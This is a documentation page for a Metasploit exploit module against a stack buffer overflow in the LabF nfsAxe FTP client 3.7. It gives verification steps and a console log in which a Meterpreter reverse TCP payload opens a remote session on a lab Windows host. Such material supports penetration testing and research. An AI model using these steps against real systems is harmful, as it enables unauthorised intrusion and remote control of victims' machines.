adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
392284465016fd7900a5e14e7c19d22c2e1571c4
metasploit-gs/documentation/modules/exploit/windows/ftp/labf_nfsaxe.md
T
Daniel Teixeira 160f960f78 Add files via upload
2018-01-04 20:25:41 +00:00

1.4 KiB
Raw Blame History

LabF nfsAxe FTP Client 3.7 Stack Buffer Overflow

Introduction

nfsAxe is NFS client an NFS server for Windows, which also includes an FTP client, Telnet, LPD & LPR and TFTP.

Vulnerable Application

The vulnerable copy can be downloaded from Exploit-DB. Tested on Windows 7 Enterprise SP1.

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/windows/ftp/labf_nfsaxe
  4. Set options and payload
  5. Do: exploit
  6. Connect to the FTP server using the FTP client
  7. You should get a session

Scenarios

msf > use exploit/windows/ftp/labf_nfsax 
msf exploit(windows/ftp/labf_nfsax) > set SRVHOST 192.168.216.3
SRVHOST => 192.168.216.3
msf exploit(windows/ftp/labf_nfsax) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/ftp/labf_nfsax) > set LHOST 192.168.216.3
LHOST => 192.168.216.3
msf exploit(windows/ftp/labf_nfsax) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.216.3:4444 
[*] Server started.
msf exploit(windows/ftp/labf_nfsax) > [*] Sending stage (179779 bytes) to 192.168.216.90
[*] Meterpreter session 1 opened (192.168.216.3:4444 -> 192.168.216.90:49161) at 2018-01-04 14:46:26 +0000

References

https://www.exploit-db.com/exploits/43236/

Reference in New Issue View Git Blame Copy Permalink